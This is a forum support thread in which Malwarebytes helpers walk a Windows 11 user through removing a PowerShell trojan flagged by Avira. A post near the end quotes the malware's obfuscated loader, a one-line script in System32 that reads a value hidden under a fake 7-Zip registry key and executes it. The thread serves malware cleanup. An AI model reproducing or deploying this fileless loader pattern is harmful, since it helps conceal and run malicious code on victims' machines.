Jump to content

A running process on your device is potentially malicious


Go to solution Solved by AdvancedSetup,

Recommended Posts

Avira security on windows 11 keeps alerting this every few seconds (started today). How can I find out what's causing this?

This is the message:

Suspicous behavior blocked
Item name: memorybuffer.f00df41003e9a3b48...
Threat name: TR/PShell.Agent.VPO
Type: TrojanStatus: Blocked
A running process on your device is potentially malicious and has been blocked.

 

malware.png

Link to post
Share on other sites

@ramiwi

Let's get the info to get the process started.

Please do the following so that we may take a closer look at your system for any possible infections.

Do these 2 steps so that ALL folders & Files are set to SHOW, plus also, Turn OFF Windows Fast start.
Show-Hidden-Folders-Files-Extensions
https://forums.malwarebytes.com/topic/299345-show-hidden-folders-files-extensions/

Disable-Fast-Startup
https://forums.malwarebytes.com/topic/299350-disable-fast-startup/

Then please restart the computer and do the following.

WARNING: Do Not click the Repair option under Advanced unless requested by a Malwarebytes support agent or authorized helper

NOTE: The tools and the information obtained are safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system.

  • Download the Malwarebytes Support Tool
  • In your Downloads folder, open the mb-support-x.x.x.xxx.exe file
  • In the User Account Control pop-up window, click Yes to continue the installation
  • Run the MBST Support Tool
  • In the left navigation pane of the Malwarebytes Support Tool, click Advanced
  • In the Advanced Options, click Gather Logs. A status diagram displays the tool is Getting logs from your machine
  • A zip file named mbst-grab-results.zip will be saved to the Desktop or on the hidden Public desktop (usually C:\Users\Public\Desktop), please upload that file on your next reply

     

Thank you

Link to post
Share on other sites

@Porthos Thanks! My results are attached.

I ran the diag tool right after booting up (I didn't have the fast startup checkbox in the unavailable settings, maybe I disabled it in my BIOS in the past).
The alerts only started about an hour after booting, and then kept popping up every few seconds. So its was quit when the tool was working. I can send another report when they will start to popup again.

The previous reply (from Said) is not related to me.

 

mbst-grab-results.zip

Link to post
Share on other sites

  • Root Admin

Give me a moment to write up a fix for you @ramiwi

In the mean time, please do the following

[ 1 ]

ATTENTION: System Restore is disabled (Total:300 GB) (Free:28.8 GB) (10%)

Please enable and create a new System Restore Point

Turn On or Off System Protection for Drives in Windows 11
https://www.elevenforum.com/t/turn-on-or-off-system-protection-for-drives-in-windows-11.3598/

Create System Restore Point in Windows 11
https://www.elevenforum.com/t/create-system-restore-point-in-windows-11.3602/


[ 2 ]

Please go to Control Panel, Programs, Programs and Features, Uninstall a program

Then right-click and uninstall the following

  • Java 8 Update 241

 

[ 3 ]

Please see the following for reference only

Class-action lawsuit against antivirus firm for selling data

 

 

 

 

  • Like 1
Link to post
Share on other sites

  • Root Admin
  • Solution

Please run the following fix

 

Make sure you temporarily disable the Avira antivirus real-time protection first

 

NOTE: Please read all of the information below before running this fix.

  • NOTICE: This script was written specifically for this user, for use on this particular machine.
  • Running this on another machine may cause damage to your operating system that cannot be undone.

Once the fix has been completed, please attach the file FIXLOG.TXT to your next reply

Farbar program:   FRSTEnglish.exe

Save the attached file:  FIXLIST.TXT to this folder C:\Users\rami_\Downloads\

NOTE. It's important that both files, FRSTEnglish.exe, and fixlist.txt are in the same location or the fix will not work.

Please make sure you disable any real-time antivirus or security software before running this script. Once completed, make sure you re-enable it.

 

 

Run the Farbar program with Admin rights and press the Fix button just once and wait.

The fix may possibly take up to 60 minutes to complete

If the tool needs a restart please make sure you let the system restart normally and let the tool complete its run after restart.
The tool will make a log named Fixlog.txt in the same folder you ran the Farbar program from. Please attach that log on your next reply.

 

  1. NOTE:  This fix will run a scan to check that all Microsoft operating system files are valid and not corrupt and attempt to correct any invalid files. It will also run a disk check on the restart to ensure disk integrity.
  2. NOTE: As part of this fix all temporary files will be removed. If you have any open web pages that have not been bookmarked please make sure you bookmark them now as all open applications may be automatically closed.
                Also, make sure you know the passwords for all websites as cookies may possibly be removed in some cases, but not all cases.
  3. NOTE: As part of this fix, it will also reset the network to default settings including the firewall. If you have custom firewall rules you need to save please export or save them first before running this fix.

The following directories are emptied:

  • Windows Temp
  • Users Temp folders
  • Edge, IE, FF, Chrome, and Opera caches, HTML5 storages, Cookies and History
  • Recently opened files cache
  • Discord cache
  • Java cache
  • Steam HTML cache
  • Explorer thumbnail and icon cache
  • BITS transfer queue (qmgr*.dat files)
  • Recycle Bin

Important: items are permanently deleted. They are not moved to quarantine. If you have any questions or concerns please ask before running this fix.

The system will be rebooted after the fix has run.

fixlist.txt

Thanks

 

  • Thanks 1
Link to post
Share on other sites

 

Many thanks! So far the alert seems to be gone.

 

That PowerShell script appears to be suspicious

C:\WINDOWS\System32\375263BC-272F-4C89-877F-092DB6A60857.ps1

$LFSXIEJqQd=[ScriptBlock];$lhcOGyDfZLnqCQ=[string];$CJbdVcGDfEVbV=[char]; icm ($LFSXIEJqQd::Create($lhcOGyDfZLnqCQ::Join('', ((gp 'HKLM:\SOFTWARE\7-ZipAA8xK7ht').'SLrPhfxtl3w' | % { [char]$_ }))))

 

Link to post
Share on other sites

  • Root Admin

Thank you for the log. It ran pretty well and also found and fixed other issues.

Windows Resource Protection found corrupt files and successfully repaired them.

 

SecurityCheck by glax24              


I would like you to run a tool named SecurityCheck to inquire about the current security update status of some applications.
CheckSecurity is a utility for quickly checking for the presence of vulnerable applications

  • Temporarily disable Microsoft SmartScreen to download the software
  • Download SecurityCheck by glax24: https://tools.safezone.cc/glax24/SecurityCheck/SecurityCheck.exe
  • If SmartScreen blocks the file from running click on More info and Run anyway
  • This tool is safe.   Smartscreen is overly sensitive. You can check the VirusTotal scan of the tool from here
  • Right-click  with your mouse on the Securitycheck.exe  and select "Run as administrator"  and reply YES to allow to run & go forward
  • Wait for the scan to finish. It will open a text file named SecurityCheck.txt Close the file.  Attach it with your next reply.
  • You can find this file in a folder called SecurityCheckC:\SecurityCheck\SecurityCheck.txt

Checked parameters:

  1. User Account Control (UAC).
  2. Service pack.
  3. IE version.
  4. Automatic OS update. Sets of critical KB patches when updating is disabled.
  5. Antivirus, firewall, other security utilities.
  6. Versions of Java, Oracle Virtualbox.
  7. Version of Adobe Flash Player, Adobe AIR.
  8. Versions of Adobe Reader, Acrobat Reader DC, Foxit Reader.
  9. Versions of media players (iTunes, AIMP, foobar2000).
  10. Versions of messengers (Skype, Pidgin).
  11. Versions of installed browsers (Chrome, Opera, Firefox, Yandex, SeaMonkey).
  12. Versions of mail programs (The Bat, Thunderbird).
  13. Checking running processes and security program services
  14. Searching for installed Adware programs and optimizer programs (More than 5000).

Thank you

 

  • Thanks 1
Link to post
Share on other sites

  • Root Admin

Please make a new System Restore Point first

Then uninstall, update, or otherwise address the following as appropriate for your computer.

 

7-Zip 22.00 (x64) v.22.00 Warning! Download Update | Uninstall old version and install new one.
Adobe Creative Cloud v.3.9.0.327 Warning! Download Update
Audacity 3.0.2 v.3.0.2 Warning! Download Update
calibre 64bit v.6.9.0 Warning! Download Update
FileZilla 3.62.2 v.3.62.2 Warning! Download Update
foobar2000 v1.6.16 v.1.6.16 Warning! Download Update
GIMP 2.10.14 v.2.10.14 Warning! Download Update
IrfanView 4.53 (64-bit) v.4.53 Warning! Download Update
Microsoft Visual Studio Code (User) v.1.82.2 Warning! Download Update
Mozilla Thunderbird 78.7.1 (x86 en-US) v.78.7.1 Warning! Download Update
Node.js v.18.12.1 Warning! Download Update
Oracle VM VirtualBox 6.1.38 v.6.1.38 Warning! Download Update
PuTTY release 0.76 (64-bit) v.0.76.0.0 Warning! Download Update
Python 2.7.15 (64-bit) v.2.7.15150 Warning! Download Update
Python 3.11.3 (64-bit) v.3.11.3150.0 Warning! Download Update
Python 3.8.1 (32-bit) v.3.8.1150.0 Warning! Download Update
Python 3.8.5 (64-bit) v.3.8.5150.0 Warning! Download Update
qBittorrent v.4.5.4 Warning! Download Update
Signal 5.29.1 v.5.29.1 Warning! Download Update
TeamViewer v.15.40.8 Warning! Download Update
WinRAR 5.71 (64-bit) v.5.71.0 Warning! Download Update

 

Please see the following for reference
https://forums.malwarebytes.com/topic/303753-class-action-lawsuit-against-antivirus-firm-for-selling-data/

---------------------------- [ UnwantedApps ] -----------------------------
Avira System Speedup v.6.26.0.18 << Hidden Warning! Suspected demo version of anti-spyware, driver updater or optimizer.

 

 

Then RESTART the computer and check for Windows Updates and install any found.

 

Let me know if there are still any signs of infection or other issues after these updates

 

Thank you

 

  • Like 1
Link to post
Share on other sites

  • 3 weeks later...
  • Root Admin

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Tips to help protect from infection

Thanks

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.